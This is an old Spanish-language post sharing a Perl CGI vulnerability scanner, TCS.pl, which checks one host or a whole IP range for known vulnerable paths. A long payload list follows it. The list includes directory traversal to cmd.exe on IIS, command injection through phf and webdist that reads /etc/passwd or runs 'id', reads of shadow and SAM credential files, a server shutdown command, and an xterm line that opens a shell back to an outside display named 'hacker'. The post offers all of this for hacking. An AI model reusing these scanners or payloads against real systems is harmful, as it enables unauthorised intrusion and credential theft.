T-RMIT@ CGI SCANNER, CGI Scanner en Perl
t-Rmit@
Si creen que le falla algo, notifiquenmelo tambien!
Copien el siguiente codigo en un fichero llamado TCS.PL
y: C:>perl tcs.pl
#! /usr/bin/perl
# TCS.pl
###################################################################
# T-RMIT@ CGI SCANNER es un escaner de CGI bugs programado por #
# t-Rmit@. Utiliza una lista de bugs que tu especifiques y puedes #
# usar una lista de hosts o IPs. Si modificas esta programa, que #
# sea para mejor y no olvides de poner mis referencias si lo #
# publicas. Feliz hack! :-) #
# Copyright © 2002 t-Rmit@ <the_7...@hotmail.com> #
###################################################################
use Socket;
$title = "T-RMIT@ CGI SCANNER";
$version = "1.0";
$author = "t-Rmit@";
$date = "08/02/02";
$barra = "-------------------------------------------------------------------------------";
print "\n\n";
print "$barra\n";
print " $title V $version Coded by $author ($date)\n";
&menu();
sub menu() {
print "$barra\n\n";
print "1) Scanear bugz a un host/IP!\n";
print "2) Scanear un bug de una IP a otra!\n";
print "3) Informacion de un host/IP\n";
print "4) Ayuda\n";
print "5) Salir\n";
print "\nQue eliges? ";
chomp($selection=<STDIN>);
if($selection == "1") { &bugscanner() }
if($selection == "2") { &serverscanner() }
if($selection == "3") { &serverinfo() }
if($selection == "4") { &help() }
if($selection == "5") { &exit() }
else { &menu() }
}
sub bugscanner() {
print "\n$barra\n\n";
print "Directorio de la lista de bugs: ";
chomp($bugslist=<STDIN>);
print "Usar lista de hosts/IP? [s/n]: ";
chomp($usehostlist=<STDIN>);
if($usehostlist eq "s") { &uselist(); }
else { &nouselist(); }
}
sub uselist() {
print "Directorio de la lista de hosts/IP: ";
chomp($hostlist=<STDIN>);
open(INF,"$hostlist") or &dienice("(!) No se pudo abrir
$hostlist\n\n");
@hostsarray = <INF>;
close(INF);
print "Quiere ver todo el scaneo detallado? [s/n]: ";
chomp($verbosemode=<STDIN>);
print "Guardar resultado en scanresult.log? [s/n]: ";
chomp($storelogs=<STDIN>);
foreach $host (@hostsarray) {
chomp($host)
&scannerloop("$host");
}
&menu();
}
sub nouselist() {
print "Scanear bugz en el host/IP: ";
chomp($host=<STDIN>);
print "Quiere ver todo el scaneo detallado? [s/n]: ";
chomp($verbosemode=<STDIN>);
print "Guardar resultado en scanresult.log? [s/n]: ";
chomp($storelogs=<STDIN>);
&scannerloop("$host");
&menu();
}
sub scannerloop() {
$host = "@_";
$serverIP = inet_aton($host);
$serverAddr = sockaddr_in(80, $serverIP);
$number = 0;
print "\nBuscando bugz en $host ...\n\n";
open(INF,"$bugslist") or &dienice("(!) No se pudo abrir
$bugslist\n\n");
@bugsarray = <INF>;
close(INF);
foreach $key (@bugsarray) {
socket(CLIENT, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
gethostbyname($host) or print "(!) No se encuentra la direccion
IP\n\n";
if(!gethostbyname($host)) { print "(!) No se puede resolver
DNS/IP\n\n"; }
else {
if(connect(CLIENT, $serverAddr)) {
send(CLIENT,"GET $key HTTP/1.0\n\n",0);
$check=<CLIENT>;
($http,$code,$therest) = split(/ /,$check);
if($code == 200) {
print "Si: $host$key";
$number++;
if($storelogs eq "s") {
open(EXLOG, ">>scanresult.log") or &dienice("(!) No se
encuentra scanresult.log... Crealo en el mismo directorio ke esta este
programa.\n");
print EXLOG "$host$key\n";
close(EXLOG);
}
}
else { if($verbosemode eq "s") { print "No: $host$key"; } }
}
close (CLIENT);
}
}
print "\nScan finalizado!";
if($number == 0) {print "\nNo se ha encontrado ningun bug!\n\n";}
if($number != 0) {print "\nSe han encontrado $number bugz!\n\n";}
}
sub serverscanner() {
print "\n$barra\n\n";
print "Buscar el bug: ";
chomp($bug=<STDIN>);
print "Scanear el dominio (formato: xxx.xxx.xxx): ";
$domain=<STDIN>;
chomp($domain);
if($domain !~ /[0-9]+\.[0-9]+\.[0-9]+/) {
print "\n(!) Dominio invalido, respetar el formato (xxx.xxx.xxx)\n";
sleep(2);
&serverscanner();
}
print "De (0-255): ";
chomp($inicio=<STDIN>);
print "A (0-255): ";
chomp($fin=<STDIN>);
print "Quiere ver todo el scaneo detallado? [s/n]: ";
chomp($verbosemodeb=<STDIN>);
print "Guardar resultado en scanresult2.log? [s/n]: ";
chomp($storelogsb=<STDIN>);
&iprangscanner("$host");
}
sub iprangscanner() {
$number = 0;
$punto = ".";
print "\nBuscando el bug en $domain.($inicio-$fin) ...\n\n";
for ($octet = $inicio; $octet <= $fin; $octet++) {
$host = ("$domain" . "$punto" . "$octet");
chomp($host);
$serverIP = inet_aton($host);
$serverAddr = sockaddr_in(80, $serverIP);
socket(CLIENT, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
gethostbyname($host) or print "(!) No se encuentra la direccion
IP\n\n";
if(!gethostbyname($host)) { print "(!) No se puede resolver
DNS/IP\n\n"; }
else {
if(connect(CLIENT, $serverAddr)) {
send(CLIENT,"GET $bug HTTP/1.0\n\n",0);
$check=<CLIENT>;
($http,$code,$therest) = split(/ /,$check);
if($code == 200) {
print "Si: $host$bug\n";
$number++;
if($storelogsb eq "s") {
open(EXLOG, ">>scanresult2.log") or &dienice("(!) No se
encuentra scanresult2.log... Crealo en el mismo directorio ke esta
este programa.\n");
print EXLOG "$host$bug\n";
close(EXLOG);
}
}
else { if($verbosemodeb eq "s") { print "No: $host$bug\n"; } }
}
close (CLIENT);
}
}
print "\nScan finalizado!";
if($number == 0) {print "\nNo se ha encontrado ningun servidor
vulnerable al bug!\n\n";}
if($number != 0) {print "\nSe han encontrado $number servidores
vulnerables al bug!\n\n";}
sleep(4);
}
sub serverinfo() {
print "\n$barra\n\n";
print "Informacion sobre el host/IP: ";
chomp($host=<STDIN>);
if(!gethostbyname($host)) { print "(!) No se puede resolver
DNS/IP\n\n"; }
else {
$serverIP = inet_aton($host);
$serverAddr = sockaddr_in(80, $serverIP);
$protocol_name = "tcp";
socket(CLIENT, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
if(connect(CLIENT, $serverAddr)) {
send(CLIENT,"HEAD / HTTP/1.0\n\n",0);
recv(CLIENT, $thedata, 10000, undef);
# $thedata=<CLIENT>;
close(CLIENT);
print "\nRespuesta de $host:\n\n$thedata\n";
}
else { print "\nConeccion rechazada por $host\n"; }
}
sleep(4);
&menu();
}
sub help() {
$arroba = "@";
$servidor = "hotmail.com";
print "\n$barra\n\n";
print "(?) Ayuda: T-Rmit@ Cgi Scanner programado por t-Rmit@\n\n";
print "Para usar correctamente la utilidad hacer lo siguiente:\n";
print " - Crear en el mismo directorio que TCS.pl, scanresult.log y
scanresult2.log\n";
print " - Tener una lista de bugs actualizada de la cual el
programa\n";
print " te pedira el directorio.\n";
print " - Si quieres escanear muchos host, ponerlos en una lista
y\n";
print " indicar en el programa el directorio.\n";
print "Acepto sugerencias y agradecimientos :-)
<the_7rm174$arroba$servidor>\n\n";
}
sub exit() {
print "\n\n GRACIAS POR USAR $title V $version!\n\n";
exit 1;
}
Si no tienes ninguna lista de bugs usa esta con 1125 bugs:
:8888/cgi-bin/admin/admin
:8765/
:8100//WEB-INF/
:801/../../../../etc/shadow
:8002/Newuser?Image=../../database/rbsserv.mdb
:8000/cgi/wja
:2301/
/zipfiles/
/wwwjoin/
/wwwboard/wwwboard.pl
/wwwboard/wwwboard.cgi
/wwwboard/password
/wwwboard/passwd.txt
/wwwboard/
/www/
/wusage/
/wstats/
/wsdocs/
/WS_fTP.log
/wforum/passwd.txt
/wforum/
/WebTrend/
/webstats/
/website/
/WebShop/templates/cc.txt
/WebShop/logs/cc.txt
/WebShop/logs/
/WebShop/
/weblogs/
/weblog/
/webdata/
/webcart/
/webboard/password.txt
/webboard/password
/webboard/passwd.txt
/webboard/passwd
/webboard/
/webadmin/
/webaccess/access-options.txt
/Web_store/
/web/bb-hist.sh
/web/
/WCB/databases/users.passwd
/WCB/databases/instructors.passwd
/wboard/passwd.txt
/wboard/
/way-board/way-board.cgi
/wais.pl
/w3perl/admin
/ustats/
/usr/adm/wtmp/
/usr/adm/wtmp
/usr/adm/lastlog
/usr/adm/
/users/scripts/submit.cgi
/users/scripts/admin.cgi
/users/
/user/
/usage/
/uploads/patch.exe
/updates/
/ultraboard.pl
/tree/
/trafficlog/
/tools/newdsn.exe
/tools/
/tools/
/today.nsf
/tmp/sims_setup.dat
/tmp/
/test-cgi/
/test/test.cgi
/test/
/temp/
/technote/technote/print.cgi
/tcb/files/auth/?/
/tcb/files/auth
/tcb/files/
/tcb/auth/files/?/
/tcb/auth/files/
/tcb/auth/
/tcb/
/support/
/super_stats/access_logs
/sults_Test/testorder.txt
/StoreDB/
/store/
/status/
/status
/Stats/
/stats/
/statistics/
/stat/
/ssi/envout.bat
/ss.cfg
/srchadm
/sql/
/source/
/software/
/SiteServer/Publishing/viewcode.asp
/Sites/Samples/Knowledge/Membership/Inspiredtutorial/ViewCode.asp
/Sites/Samples/Knowledge/Membership/Inspired/ViewCode.asp
/Sites/Knowledge/Membership/Inspiredtutorial/ViewCode.asp
/Sites/Knowledge/Membership/Inspired/ViewCode.asp
/siteman000510/siteman.php3
/site/eg/source.asp
/shtml/
/showfile.asp
/shopper/
/shop/product.ast
/shop/product.asp
/shop/
/shop/
/setup/
/session/adminlogin?RCpage=/sysadmin/index.stm
/session/adminlogin
/servlet//..//../o.jsp
/server-status
/server-info
/server_stats/
/server%20logfile
/sell/
/security/.wwwacl
/security/.htaccess
/secure/wwwacl/
/secure/htaccess/
/secure/htaccess
/secure/.wwwacl
/secure/.htaccess/
/secure/.htaccess
/search97cgi/s97_cgi
/search97.vts
/search.vts
/search.dll
/seach.vts
/scripts/wsisa.dll/WService=anything?WSMadmin
/scripts/wsisa.dll
/scripts/wguest.exe
/scripts/weblog
/scripts/webbbs.exe
/scripts/visitor.exe
/scripts/uploadx.asp
/scripts/uploadn.asp
/scripts/upload.asp
/scripts/tools/newdns.exe
/scripts/tools/mkilog.exe
/scripts/tools/logs.exe
/scripts/tools/log.exe
/scripts/tools/getdrvrs.exe
/scripts/tools/dsnform.exe
/scripts/tools/dsn.exe
/scripts/tools/dnsform.exe
/scripts/tools/ctss.idc
/scripts/tools/ctss.htx
/scripts/tools/ct.idc
/scripts/tools/ct.htx
/scripts/tools/
/scripts/testcgi.exe
/scripts/test.pl%3F+.htr
/scripts/submit.cgi
/scripts/srchadm/admin.idq
/scripts/snorkerz.cmd
/scripts/snorkerz.bat
/scripts/slxweb.dll/admin?command=shutdown
/scripts/slxweb.dll
/scripts/samples/search/webhits.exe
/scripts/samples/details.idq
/scripts/samples/details.idc
/scripts/samples/ctguestbook.idc
/scripts/samples/ctguestb.idc
/scripts/samples/ctguestb.idc
/scripts/samples/
/scripts/rguest.exe
/scripts/repost.asp
/scripts/redir.exe
/scripts/rb.dll
/scripts/pu3.pl
/scripts/pu3.cgi
/scripts/pu3
/scripts/proxy/w3proxy.dll
/scripts/ppdscgi.exe
/scripts/postinfo.asp
/scripts/perl?
/scripts/no-such-file.pl
/scripts/minimal.exe
/scripts/isapi/srch.htm
/scripts/iisadmin/samples/viewbook.idc
/scripts/iisadmin/samples/viewbook.htx
/scripts/iisadmin/samples/sample2.idc
/scripts/iisadmin/samples/sample2.htx
/scripts/iisadmin/samples/sample.idc
/scripts/iisadmin/samples/sample.htx
/scripts/iisadmin/samples/register.idc
/scripts/iisadmin/samples/register.htx
/scripts/iisadmin/samples/query.idc
/scripts/iisadmin/samples/query.htx
/scripts/iisadmin/samples/details.idc
/scripts/iisadmin/samples/details.htx
/scripts/iisadmin/samples/ctgestb.idc
/scripts/iisadmin/samples/ctgestb.htx
/scripts/iisadmin/samples/
/scripts/iisadmin/ism.dll?http/dir
/scripts/iisadmin/ism.dll
/scripts/iisadmin/default.htm
/scripts/iisadmin/bdir.htr?dir=ht??c:\
/scripts/iisadmin/bdir.htr
/scripts/iisadmin/
/scripts/fpsrvadm.exe
/scripts/fpremadm.exe
/scripts/fpcount.exe
/scripts/fpadmcgi.exe
/scripts/Fpadmcgi.exe
/scripts/emurl/RECMAN.dll
/scripts/default.asp%20.pl
/scripts/default.asp
/scripts/dbman/db.cgi?db=no-db
/scripts/dbman/db.cgi
/scripts/dasp/fm_shell.asp
/scripts/cpshost.dll
/scripts/counter.exe?AAAAAover-2200-As
/scripts/counter.exe?%0A
/scripts/counter.exe
/scripts/convert.bas
/scripts/cgitest.exe
/scripts/cgimail.exe
/scripts/CGImail.exe
/scripts/cgimail.exe
/scripts/cfgwiz.exe
/scripts/cart32.exe/cart32clientlist
/scripts/Carello/Carello.dll?CARELLOCODE=SITE2&VBEXE=C:\..\winnt\system32\cmd.exe%20/c%20
echo%20test>c:\tmgroup.txt/scripts/c32web.exe/ChangeAdminPassword
/scripts/c32web.exe
/scripts/admisapi/fpadmin.htm
/scripts/admcgi/scripts/Fpadmcgi.exe
/scripts/admcgi/contents.htm
/scripts/abracadabra.cmd
/scripts/abracadabra.bat
/scripts/../../cmd.exe
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/*.pl
/scripts/%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\
/scripts/
/script.cgi%00
/samples/upload.htm
/samples/search/webhits.exe
/samples/search/queryhit.htm
/samples/
/sales/
/s%65cure
/Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
/Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/root/
/robots.txt
/ROADS/cgi-bin/search.pl
/roads/cgi/search.pl
/retail/
/reseller/
/registered/
/register/
/random_banner/index.cgi
/quote.html
/quikstore.cfg
/pw/storemgr.pw
/pw/
/purchases/
/purchase/
/publisher/publish/
/publisher/
/publish/
/public/
/pub/
/PSUser/PSCOErrPage.htm?errPagePath=/etc/passwd
/prxdocs/misc/prxrch.idq
/prxdocs/
/products/phpPhotoAlbum/explorer.php
/product.asp
/post32.exe|echo%20>c:\text.txt
/post/
/piranha/secure/passwd.php3
/phpPhotoAlbum/getalbum.php
/phpPhotoAlbum/explorer.php?folder=../../../../
/perl/perl.exe
/perl/files.pl
/perl/
/PDG_Cart/shopper.conf
/PDG_Cart/order.log
/PDG_Cart/
/pccsmysqladm/incs/dbconnect.inc
/PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
/PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/passwords/
/pages/
/ows-bin/*.bat
/OvCgi/OpenView5.exe
/outgoing/
/orders/results
/orders/orders.txt
/orders/orders.log
/orders/mountain.cfg
/orders/import.txt
/orders/
/orders.htm
/orderform/orders.txt
/orderdb/shop.mdb
/order/
/oracle/
/opt/netscape/suitespot/admin-serv/config/admpw
/onlineor.htm
/old/
/officescan/cgi/jdkRqNotify.exe
/officescan/cgi/
/officescan/
/odbc/
/null.htw?CiWebHitsFile=/default.asp%20&CiRestriction=none&CiHiliteType=Full
/null.htw
/notexist.idq
/notexist.idc
/notexist.ida
/notexist.htw
/nonexistant.pl
/news/
/new/
/ncl_items.html
/names.nsf
/mylog.html
/msads/Samples/SELECTOR/showcode.asp
/msadc/Samples/SELECTOR/showcode.asp?source=/msadc/Samples/../../../boot.ini
/msadc/samples/selector/showcode.asp
/msadc/Samples/SELECTOR/showcode.asp
/msadc/samples/adctest.asp
/msadc/msadcs.dll
/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/MSADC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/MSADC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
/MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/mlog.html?screen=/etc/passwd
/mlog.html
/ministats/admin.cgi
/marketing/
/manual/
/manage/cgi/cgiproc?!
/mall_log_files/order.log
/mall_log_files/
/main.asp%81
/mailfile.cgi
/mail/
/lpt
/logs/access_log
/logs/
/login/
/logging/
/logger/
/logfiles/
/logfile/
/log/
/log.nsf
/info/
/index.asp::$DATA
/incoming/
/includes/global.inc
/import/
/iissamples/sdk/asp/docs/codebrws.asp
/iissamples/Sdk/Asp/Docs/Codebrws.asp
/iissamples/sdk/asp/docs/codebrw2.asp
/iissamples/query.asp
/iissamples/issamples/query.idq
/iissamples/issamples/oop/qsumrhit.htw
/iissamples/issamples/oop/qfullhit.htw
/iissamples/issamples/fastq.idq
/iissamples/iissamples/query.asp
/iissamples/iissamples/
/iissamples/exair/Search/search.idq
/iissamples/exair/Search/query.idq
/iissamples/exair/search/qsumrhit.htw
/iissamples/exair/search/qfullhit.htw
/iissamples/exair/Search/advsearch.asp
/iissamples/exair/howitworks/codebrws.asp
/iissamples/Exair/Howitworks/Codebrws.asp
/iissamples/exair/howitworks/codebrws.asp
/iissamples/exair/howitworks/Codebrw1.asp
/iissamples/exair/howitworks/code.asp
/iissamples/Exair/Howitworks/Code.asp
/iissamples/exair/
/iishelp/iis/misc/iirturnh.htw
/iishelp/iis/misc/
/iishelp/iis/
/iishelp/
/iisadmpwd/anot3.htr
/iisadmpwd/anot2.htr
/iisadmpwd/anot.htr
/iisadmpwd/aexp4b.htr
/iisadmpwd/aexp4.htr
/iisadmpwd/aexp3.htr
/iisadmpwd/aexp2b.htr
/iisadmpwd/aexp2.htr
/iisadmpwd/aexp.htr
/iisadmpwd/achg.htr
/iisadmpwd/
/iisadmin
/ibill/
/hyperstat/stat_what.log
/html/
/htdocs/_vti_pvt/service.pwd
/htdocs/
/home/
/hitmatic/analyse.cgi
/hitmatic/
/hit_tracker/
/guests/
/guestbook/
/global.asa
/GetFile.cfm?FT=Text&FST=Plain&FilePath=C:\\WINNT\\repair\\sam._
/GetFile.cfm
/getdrvrs.exe
/ftp/
/fpadmin/
/forums/passwd.txt
/forum/passwords.txt
/forum/passwd.txt
/forum/forums.mdb
/forum/forum.mdb
/forum/
/form-totaller/form-totaller.cgi
/formmail.cgi
/form_results.txt
/feedback.txt
/exec/show/config/cr
/exampleapp/docs/sourcewindow.cfm
/everythingform.cgi
/etc/utmp
/etc/udb
/etc/tcb/aa/user/
/etc/tcb/aa/
/etc/shadow/
/etc/shadow
/etc/security/passwd.adjunct
/etc/security/passwd
/etc/security/
/etc/security
/etc/secure/
/etc/secure
/etc/passwd
/etc/master.passwd
/etc/auth[.dir|.pag]
/etc/
/employees/
/easylog/easylog.html
/dvwssr.dll
/dos/
/domlog.nsf
/domcfg/
/domcfg.nsf/?open
/domcfg.nsf
/docs/
/doc-html/
/doc/
/doc
/DMR/
/default.asp::$DATA
/debug.txt
/ddrint/bin/ddicgi.exe
/dbase/
/db/
/databases/
/database/
/DataBase/
/database/
/database.nsf
/data/
/dat/
/customers/
/credit/
/cp/rac/nsManager.cgi
/config/import.txt
/config/html/cnf_gi.htm
/config/
/config.inc
/con
/com3/
/com2/
/com1/
/code.php3
/chat/passwords.txt
/chat/password.txt
/chat/passwd.txt
/chat/passwd.pl
/chat/passwd.cgi
/chat/
/cgi-win/uploader.exe
/cgi-temp/
/cgi-shl/win-c-sample.exe
/cgi-shl/
/cgi-dos/uploads/patch.exe
/cgi-dos/patch.exe
/cgi-dos/args.cmd
/cgi-dos/args.bat
/cgi-dos/
/cgi-bin/zsh
/cgi-bin/YaBB.pl
/cgi-bin/wwwstats.pl
/cgi-bin/www-sql
/cgi-bin/wwwboard/wwwboard.pl
/cgi-bin/wwwboard/wwwboard.cgi
/cgi-bin/wwwboard/passwd.txt
/cgi-bin/wwwboard.pl
/cgi-bin/wwwadmin.pl
/cgi-bin/ws_ftp.ini
/cgi-bin/wrap?/../../../../../etc
/cgi-bin/wrap/blah;/tmp/myscript
/cgi-bin/wrap.cgi
/cgi-bin/wrap
/cgi-bin/WINDMAIL.EXE?%20-n%20c:\boot.ini%
/cgi-bin/win2win.cgi
/cgi-bin/whois_raw.cgi
/cgi-bin/whois.cgi?host=|127.0.0.1|
/cgi-bin/wguest.exe
/cgi-bin/webwho.pl
/cgi-bin/webutils.pl
/cgi-bin/webutil.pl?;%20cat%20/etc/passwd
/cgi-bin/webutil.pl
/cgi-bin/webspirs.cgi?sp.nextform=../../../../../../../../../etc/passwd
/cgi-bin/webspirs.cgi
/cgi-bin/websendmail
/cgi-bin/webplus?script=/script_dir/store.wml
/cgi-bin/webplus?script=/../../../../etc/passwd
/cgi-bin/webplus?about
/cgi-bin/webplus.exe
/cgi-bin/webplus.cgi
/cgi-bin/webplus
/cgi-bin/webmap.pl
/cgi-bin/webmap.cgi
/cgi-bin/webmap
/cgi-bin/webmail.cgi?subject=;id;&send_to=&response_url=/
/cgi-bin/webmail.cgi
/cgi-bin/webgais
/cgi-bin/webdist.cgi?distloc=;ls%20-lFa%20/etc/
/cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd
/cgi-bin/webdist.cgi?distloc=;/usr/bin/X11/xterm%20-display%20hacker:0.0
%20-ut%20-e%20/bin/sh
/cgi-bin/webdist.cgi?distloc=;/bin/cat%20/etc/group
/cgi-bin/webdist.cgi
/cgi-bin/webdata_test.pl
/cgi-bin/webbbs.cgi
/cgi-bin/Web_Store/web_store.cgi?page=../../../path/filename%00ext
/cgi-bin/Web_Store/web_store.cgi
/cgi-bin/wconsole.dll
/cgi-bin/wais.pl
/cgi-bin/w3-sql
/cgi-bin/w3-msql/index.html
/cgi-bin/w3-msql
/cgi-bin/visitor.exe
/cgi-bin/visadmin.exe?user=guest
/cgi-bin/view-source?../../../../etc/passwd
/cgi-bin/view-source?../../../../../../etc/group
/cgi-bin/view-source
/cgi-bin/viewlogs.pl
/cgi-bin/uptime
/cgi-bin/upload.pl
/cgi-bin/unlg1.2
/cgi-bin/unlg1.1
/cgi-bin/ultraboard.pl
/cgi-bin/ultraboard.cgi
/cgi-bin/ubb/ubb-library.cgi
/cgi-bin/tst2.bat
/cgi-bin/tst.bat
/cgi-bin/traceroute.cgi?host=|127.0.0.1|
/cgi-bin/tpgnrock
/cgi-bin/tigvote.cgi
/cgi-bin/tidfinder.cgi
/cgi-bin/textcounter.pl
/cgi-bin/test-env
/cgi-bin/test-cgi
/cgi-bin/test.cgi
/cgi-bin/test.bat
/cgi-bin/tcsh
/cgi-bin/tablebuild.pl
/cgi-bin/survey.cgi
/cgi-bin/suche/hsx.cgi
/cgi-bin/subscribe.pl
/cgi-bin/store.cgi
/cgi-bin/statview.pl
/cgi-bin/statsconfig
/cgi-bin/stats.prg
/cgi-bin/stats.prf
/cgi-bin/stats.pl
/cgi-bin/stats.cgi
/cgi-bin/stat/
/cgi-bin/ssi/cgi-bin/
/cgi-bin/ssi//%2e%2e/%2e%2e/etc/passwd
/cgi-bin/ssi//%2e%2e/%2e%2e//etc/passwd
/cgi-bin/ssi/.htpasswd
/cgi-bin/spin_client.cgi
/cgi-bin/sojourn.cgi?cat=../../../../../../etc/passwd%00
/cgi-bin/sojourn.cgi
/cgi-bin/site_ftp.pl
/cgi-bin/shopper.cgi?newpage=../../../etc/passwd
/cgi-bin/shopper.cgi
/cgi-bin/sh
/cgi-bin/sendtemp.pl
/cgi-bin/sendform.cgi
/cgi-bin/search/search.cgi
/cgi-bin/search.cgi
/cgi-bin/sawmill5
/cgi-bin/sawmill
/cgi-bin/s.cgi
/cgi-bin/rwwwshell.pl
/cgi-bin/rpm_query
/cgi-bin/robpoll.cgi
/cgi-bin/robadmin.cgi
/cgi-bin/rguest.exe
/cgi-bin/responder.cgi
/cgi-bin/replicator/webpage.cgi
/cgi-bin/redir.exe
/cgi-bin/ratlog.cgi
/cgi-bin/quikstore.cgi
/cgi-bin/query?mss=../config
/cgi-bin/query
/cgi-bin/pu3.pl
/cgi-bin/profile.cgi
/cgi-bin/printenv
/cgi-bin/ppdscgi.exe
/cgi-bin/ppdscgi.cgi
/cgi-bin/postcards.cgi
/cgi-bin/post32.exe|echo%20>c:\text.txt
/cgi-bin/post32.exe|dir%20c:\
/cgi-bin/post32.exe
/cgi-bin/post16.exe
/cgi-bin/post_query.pl
/cgi-bin/post_query.cgi
/cgi-bin/post_query
/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=/etc/group%00
/cgi-bin/pollit
/cgi-bin/plusmail
/cgi-bin/ping.cgi?host=|127.0.0.1|
/cgi-bin/ping.cgi
/cgi-bin/php-cgi
/cgi-bin/php.cgi?/etc/passwd
/cgi-bin/php.cgi?/etc/group
/cgi-bin/php.cgi
/cgi-bin/php
/cgi-bin/phf?Qname=root%0A/bin/cat%20/etc/passwd
/cgi-bin/phf?QALIAS=x%0a/bin/cat%20/etc/group
/cgi-bin/phf.pp
/cgi-bin/phf.cgi
/cgi-bin/phf
/cgi-bin/pfdisplay.cgi?'%0Als%20-lFa%20/etc/'
/cgi-bin/pfdisplay.cgi
/cgi-bin/pfdispaly?../../../../../../etc/group
/cgi-bin/pfdispaly.cgi?../../../../../../etc/group
/cgi-bin/pfdispaly.cgi
/cgi-bin/perlshop.cgi
/cgi-bin/perl.exe
/cgi-bin/perl
/cgi-bin/password.txt
/cgi-bin/password
/cgi-bin/passwd.txt
/cgi-bin/passwd
/cgi-bin/pals-cgi?palsAction=restart&documentName=../../../../../../../etc/passwd
/cgi-bin/pals-cgi
/cgi-bin/page-og.cgi
/cgi-bin/pagelog.cgi
/cgi-bin/nto
/cgi-bin/ntitar.pl
/cgi-bin/nph-test-cgi
/cgi-bin/nph-publish
/cgi-bin/nph-proxy.cgi
/cgi-bin/nph-error.pl
/cgi-bin/nph-error.cgi
/cgi-bin/nlog-smb.pl
/cgi-bin/nlog-smb.cgi
/cgi-bin/nlog-smb
/cgi-bin/news/news.cgi
/cgi-bin/news.cgi
/cgi-bin/netauth.cgi
/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w
/cgi-bin/multihtml.pl?multi=/etc/passwd%00html
/cgi-bin/mlog.shtml
/cgi-bin/mlog.phtml
/cgi-bin/mlog.htm
/cgi-bin/minimal.exe
/cgi-bin/mini_logger.cgi
/cgi-bin/meta.pl
/cgi-bin/message.cgi
/cgi-bin/mdma.bat
/cgi-bin/man.sh
/cgi-bin/mailview.cgi
/cgi-bin/mailnews.cgi
/cgi-bin/mailmachine.cgi
/cgi-bin/maillist.pl
/cgi-bin/maillist.cgi
/cgi-bin/mailit.pl
/cgi-bin/mailform.exe
/cgi-bin/mail
/cgi-bin/MachineInfo
/cgi-bin/LWGate.pl
/cgi-bin/lwgate.cgi
/cgi-bin/LWGate.cgi
/cgi-bin/LWGate
/cgi-bin/lsindex2.bat
/cgi-bin/lsin.exe
/cgi-bin/lookwho.cgi
/cgi-bin/lookup.cgi?lookup=|127.0.0.1|
/cgi-bin/logs/
/cgi-bin/logs.pl
/cgi-bin/logs.cgi
/cgi-bin/logs
/cgi-bin/log-reader.cgi
/cgi-bin/logit.cgi
/cgi-bin/login.pl
/cgi-bin/login.cgi
/cgi-bin/log/nether-log.pl?checkit
/cgi-bin/log/
/cgi-bin/loadpage.cgi
/cgi-bin/lmail.pl
/cgi-bin/lister
/cgi-bin/jj.cgi
/cgi-bin/jj
/cgi-bin/Iwgate.pl
/cgi-bin/Iwgate.cgi
/cgi-bin/Iwgate
/cgi-bin/input2.bat
/cgi-bin/input/
/cgi-bin/input.bat
/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|/bin/cat%20/etc/group
/cgi-bin/infosrch.cgi
/cgi-bin/info2www?`(../../../../../../../../ls%20-lFa%20/etc|)`
/cgi-bin/info2www
/cgi-bin/include
/cgi-bin/imapncsa.exe
/cgi-bin/imapcern.exe
/cgi-bin/imagemap.exe
/cgi-bin/icat.pl
/cgi-bin/icat.cgi
/cgi-bin/icat
/cgi-bin/htsearch?exclude=%60/etc/passwd%60
/cgi-bin/htsearch?exclude=%60/etc/group%60
/cgi-bin/htsearch
/cgi-bin/htmlscript?../../../../etc/passwd
/cgi-bin/htmlscript?../../../../../../etc/group
/cgi-bin/htmlscript
/cgi-bin/htmldocs
/cgi-bin/html_page
/cgi-bin/htimage.exe
/cgi-bin/htgrep/htgrep.cgi
/cgi-bin/htgrep/file=index.html&hdr=/etc/passwd
/cgi-bin/htgrep
/cgi-bin/hsx.cgi
/cgi-bin/hitview.cgi
/cgi-bin/hello.bat
/cgi-bin/handler/useless_shit;ls%20-lFa%20/etc|?data=Download
/cgi-bin/handler.cgi
/cgi-bin/handler
/cgi-bin/GW5/GWWEB.EXE
/cgi-bin/guestbook.pl
/cgi-bin/guestbook.cgi
/cgi-bin/guest.cgi
/cgi-bin/glimpse
/cgi-bin/gH.cgi
/cgi-bin/getdoc.cgi
/cgi-bin/get32.exe
/cgi-bin/get16.exe
